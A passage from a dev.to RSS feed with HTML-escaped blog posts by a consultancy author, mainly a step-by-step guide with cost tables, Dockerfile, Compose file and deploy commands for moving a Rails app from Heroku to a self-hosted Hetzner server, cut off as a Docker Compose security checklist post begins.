  Free Environment Audit
&lt;/h2&gt;

&lt;p&gt;We'll review your AWS environments (prod, staging, dev) and show you exactly where the waste is. 15 minutes, free, no pitch.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Book a slot:&lt;/strong&gt; &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;techsaas.cloud/contact&lt;/a&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Complete PaaS Exit Playbook: Heroku to Self-Hosted in 72 Hours</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Fri, 08 May 2026 06:00:09 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/complete-paas-exit-playbook-heroku-to-self-hosted-in-72-hours-5egf</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/complete-paas-exit-playbook-heroku-to-self-hosted-in-72-hours-5egf</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/paas-exit-heroku-to-self-hosted-72-hours" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/paas-exit-heroku-to-self-hosted-72-hours?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=paas-exit-heroku-to-self-hosted-72-hours" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  Complete PaaS Exit Playbook: Heroku to Self-Hosted in 72 Hours
&lt;/h1&gt;

&lt;p&gt;We've migrated 6 startups off Heroku and Render in the past year. Average cost reduction: 87%. No client has gone back.&lt;/p&gt;

&lt;p&gt;This is the exact playbook we use. Three days, start to finish.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Economics That Force the Move
&lt;/h2&gt;

&lt;p&gt;Here's a real client breakdown (Series A, Rails app, ~5K DAU):&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Heroku Item&lt;/th&gt;
&lt;th&gt;Monthly Cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;4× Performance-M Dynos&lt;/td&gt;
&lt;td&gt;$1,000&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Heroku Postgres (Standard-0)&lt;/td&gt;
&lt;td&gt;$50&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Heroku Redis (Premium-0)&lt;/td&gt;
&lt;td&gt;$200&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Heroku Data for Redis&lt;/td&gt;
&lt;td&gt;$200&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Papertrail (logging)&lt;/td&gt;
&lt;td&gt;$230&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scout APM&lt;/td&gt;
&lt;td&gt;$120&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Heroku CI&lt;/td&gt;
&lt;td&gt;$100&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SSL, Scheduler, misc add-ons&lt;/td&gt;
&lt;td&gt;$900&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;$2,800/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The replacement:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Self-Hosted Item&lt;/th&gt;
&lt;th&gt;Monthly Cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Hetzner CX41 (16GB RAM, 4 vCPU)&lt;/td&gt;
&lt;td&gt;$15&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hetzner managed Postgres&lt;/td&gt;
&lt;td&gt;$25&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Backblaze B2 backups&lt;/td&gt;
&lt;td&gt;$5&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain + DNS (Cloudflare free)&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monitoring (Grafana + Prometheus, self-hosted)&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CI/CD (Gitea Actions, self-hosted)&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Uptime monitoring (Uptime Kuma, self-hosted)&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;$45/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Actual client paid $240/mo because they chose managed Postgres on a larger plan and a beefier server for headroom. Still 91% savings.&lt;/p&gt;

&lt;h2&gt;
  
  
  Day 1: Containerize (8 hours)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Step 1: Create a Dockerfile
&lt;/h3&gt;

&lt;p&gt;If you're on Heroku, you likely have a &lt;code&gt;Procfile&lt;/code&gt;. The translation is direct:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# Heroku Procfile: web: bundle exec puma -C config/puma.rb&lt;/span&gt;
&lt;span class="c"&gt;# Docker equivalent:&lt;/span&gt;

&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;ruby:3.2-slim&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;base&lt;/span&gt;
&lt;span class="k"&gt;WORKDIR&lt;/span&gt;&lt;span class="s"&gt; /app&lt;/span&gt;

&lt;span class="c"&gt;# Install dependencies&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;  build-essential libpq-dev nodejs npm &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;  &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/lib/apt/lists/&lt;span class="k"&gt;*&lt;/span&gt;

&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; Gemfile Gemfile.lock ./&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;bundle &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;--deployment&lt;/span&gt; &lt;span class="nt"&gt;--without&lt;/span&gt; development &lt;span class="nb"&gt;test&lt;/span&gt;

&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; . .&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;bundle &lt;span class="nb"&gt;exec &lt;/span&gt;rake assets:precompile

&lt;span class="c"&gt;# Production stage&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; ruby:3.2-slim&lt;/span&gt;
&lt;span class="k"&gt;WORKDIR&lt;/span&gt;&lt;span class="s"&gt; /app&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; libpq-dev &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;  &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/lib/apt/lists/&lt;span class="k"&gt;*&lt;/span&gt;

&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; --from=base /app /app&lt;/span&gt;

&lt;span class="k"&gt;USER&lt;/span&gt;&lt;span class="s"&gt; 1000:1000&lt;/span&gt;
&lt;span class="k"&gt;EXPOSE&lt;/span&gt;&lt;span class="s"&gt; 3000&lt;/span&gt;
&lt;span class="k"&gt;CMD&lt;/span&gt;&lt;span class="s"&gt; ["bundle", "exec", "puma", "-C", "config/puma.rb"]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 2: Create docker-compose.yml
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;build&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.&lt;/span&gt;
    &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1000:1000"&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;127.0.0.1:3000:3000"&lt;/span&gt;
    &lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;DATABASE_URL=postgres://app:${DB_PASS}@postgres:5432/app_prod&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;REDIS_URL=redis://redis:6379/0&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;RAILS_ENV=production&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;SECRET_KEY_BASE=${SECRET_KEY}&lt;/span&gt;
    &lt;span class="na"&gt;depends_on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;postgres&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;redis&lt;/span&gt;
    &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1G&lt;/span&gt;
          &lt;span class="na"&gt;cpus&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;2.0'&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;

  &lt;span class="na"&gt;postgres&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:16-alpine&lt;/span&gt;
    &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;999:999"&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;pgdata:/var/lib/postgresql/data&lt;/span&gt;
    &lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;POSTGRES_PASSWORD=${DB_PASS}&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;POSTGRES_DB=app_prod&lt;/span&gt;
    &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1G&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;

  &lt;span class="na"&gt;redis&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;redis:7-alpine&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;redisdata:/data&lt;/span&gt;
    &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;256M&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;

  &lt;span class="na"&gt;traefik&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;traefik:v3&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;443:443"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;80:80"&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/var/run/docker.sock:/var/run/docker.sock:ro&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;./traefik:/etc/traefik&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;

&lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;pgdata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;redisdata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;

&lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;backend&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 3: Test locally
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker compose up &lt;span class="nt"&gt;--build&lt;/span&gt;
&lt;span class="c"&gt;# Hit localhost:3000, verify everything works&lt;/span&gt;
&lt;span class="c"&gt;# Run your test suite against Docker&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Day 2: Provision and Migrate Data (8 hours)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Step 1: Provision the server
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Hetzner CLI (or use their web UI)&lt;/span&gt;
hcloud server create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; prod-01 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--type&lt;/span&gt; cx41 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt; ubuntu-24.04 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--ssh-key&lt;/span&gt; my-key &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt; nbg1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 2: Bootstrap the server
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# SSH in and run&lt;/span&gt;
apt update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt upgrade &lt;span class="nt"&gt;-y&lt;/span&gt;
apt &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; docker.io docker-compose-v2
systemctl &lt;span class="nb"&gt;enable &lt;/span&gt;docker

&lt;span class="c"&gt;# Create deploy user&lt;/span&gt;
useradd &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="nt"&gt;-s&lt;/span&gt; /bin/bash deploy
usermod &lt;span class="nt"&gt;-aG&lt;/span&gt; docker deploy

&lt;span class="c"&gt;# Set up firewall&lt;/span&gt;
ufw allow 22/tcp
ufw allow 80/tcp
ufw allow 443/tcp
ufw &lt;span class="nb"&gt;enable&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 3: Migrate the database
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Export from Heroku&lt;/span&gt;
heroku pg:backups:capture &lt;span class="nt"&gt;--app&lt;/span&gt; your-app
heroku pg:backups:download &lt;span class="nt"&gt;--app&lt;/span&gt; your-app

&lt;span class="c"&gt;# Import to new Postgres&lt;/span&gt;
docker compose up &lt;span class="nt"&gt;-d&lt;/span&gt; postgres
docker compose &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-T&lt;/span&gt; postgres pg_restore &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-U&lt;/span&gt; postgres &lt;span class="nt"&gt;-d&lt;/span&gt; app_prod &amp;lt; latest.dump
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 4: Migrate files/assets
&lt;/h3&gt;

&lt;p&gt;If using Heroku's ephemeral filesystem, you're probably already on S3. Just update the credentials in your env.&lt;/p&gt;

&lt;p&gt;If using Heroku's built-in file storage... that data is gone on every deploy anyway. Nothing to migrate.&lt;/p&gt;

&lt;h2&gt;
  
  
  Day 3: Go Live (4 hours)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Step 1: Deploy and verify
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# On the server&lt;/span&gt;
docker compose up &lt;span class="nt"&gt;-d&lt;/span&gt;
docker compose logs &lt;span class="nt"&gt;-f&lt;/span&gt; app  &lt;span class="c"&gt;# Watch for startup errors&lt;/span&gt;

&lt;span class="c"&gt;# Health check&lt;/span&gt;
curl &lt;span class="nt"&gt;-s&lt;/span&gt; https://your-domain.com/health | jq &lt;span class="nb"&gt;.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 2: Set up CI/CD
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .gitea/workflows/deploy.yml (or .github/workflows)&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Deploy&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;push&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;branches&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;main&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Deploy&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;ssh deploy@your-server "cd /app &amp;amp;&amp;amp; git pull &amp;amp;&amp;amp; docker compose up -d --build"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now &lt;code&gt;git push&lt;/code&gt; deploys — same as Heroku.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Flip DNS
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Update your domain's A record to the new server IP&lt;/span&gt;
&lt;span class="c"&gt;# TTL: start at 60 seconds, increase after verification&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 4: Monitor for 48 hours
&lt;/h3&gt;

&lt;p&gt;Keep Heroku running for 48 hours as rollback. Watch:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Response times (should be same or faster)&lt;/li&gt;
&lt;li&gt;Error rates&lt;/li&gt;
&lt;li&gt;Database connections&lt;/li&gt;
&lt;li&gt;Memory/CPU usage&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  What You Keep
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Heroku Feature&lt;/th&gt;
&lt;th&gt;Self-Hosted Equivalent&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;git push&lt;/code&gt; deploy&lt;/td&gt;
&lt;td&gt;CI/CD pipeline (2 minutes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auto-SSL (ACM)&lt;/td&gt;
&lt;td&gt;Traefik + Let's Encrypt (automatic)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rollbacks&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;docker compose up -d --build&lt;/code&gt; previous commit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Logging&lt;/td&gt;
&lt;td&gt;Loki + Grafana (better than Papertrail)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Metrics&lt;/td&gt;
&lt;td&gt;Prometheus + Grafana (better than Scout)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scaling&lt;/td&gt;
&lt;td&gt;Docker Compose replicas&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  What You Gain
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Full control&lt;/strong&gt; — no vendor can change pricing under you&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;10x capacity headroom&lt;/strong&gt; — a $15/month server handles more than 4 Heroku dynos&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Better debugging&lt;/strong&gt; — SSH into the box, inspect everything&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No add-on tax&lt;/strong&gt; — every Heroku add-on has a free self-hosted alternative&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  When NOT to Self-Host
&lt;/h2&gt;

&lt;p&gt;Be honest with yourself:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No ops experience and no budget to learn:&lt;/strong&gt; Stay on PaaS until you have someone who can SSH into a server confidently&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance requirements:&lt;/strong&gt; Some industries require specific cloud certifications&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;True auto-scaling needs:&lt;/strong&gt; If you go from 100 to 100,000 requests in seconds, managed infrastructure is worth it&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For the other 90% of startups: you're overpaying for convenience you've already outgrown.&lt;/p&gt;

&lt;h2&gt;
  
  
  Free Migration Assessment
&lt;/h2&gt;

&lt;p&gt;Not sure if migration makes sense for your stack? We'll review your current Heroku/Render setup, estimate your self-hosted costs, and give you an honest recommendation in 15 minutes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Book a call:&lt;/strong&gt; &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;techsaas.cloud/contact&lt;/a&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>The 5-Minute Docker Compose Security Checklist We Run for Every Client</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Fri, 08 May 2026 06:00:06 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/the-5-minute-docker-compose-security-checklist-we-run-for-every-client-a31</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/the-5-minute-docker-compose-security-checklist-we-run-for-every-client-a31</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/docker-compose-security-checklist-5-minutes" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/docker-compose-security-checklist-5-minutes?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=docker-compose-security-checklist-5-minutes" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  The 5-Minute Docker Compose Security Checklist We Run for Every Client
&lt;/h1&gt;

&lt;p&gt;We've reviewed Docker Compose configurations for over 30 startups. These three security holes appear in every single one. Without exception.&lt;/p&gt;

&lt;p&gt;They're trivial to fix. Most teams just never do because nobody tells them until something goes wrong.&lt;/p&gt;

&lt;h2&gt;
  
  
  Hole #1: Ports Bound to 0.0.0.0
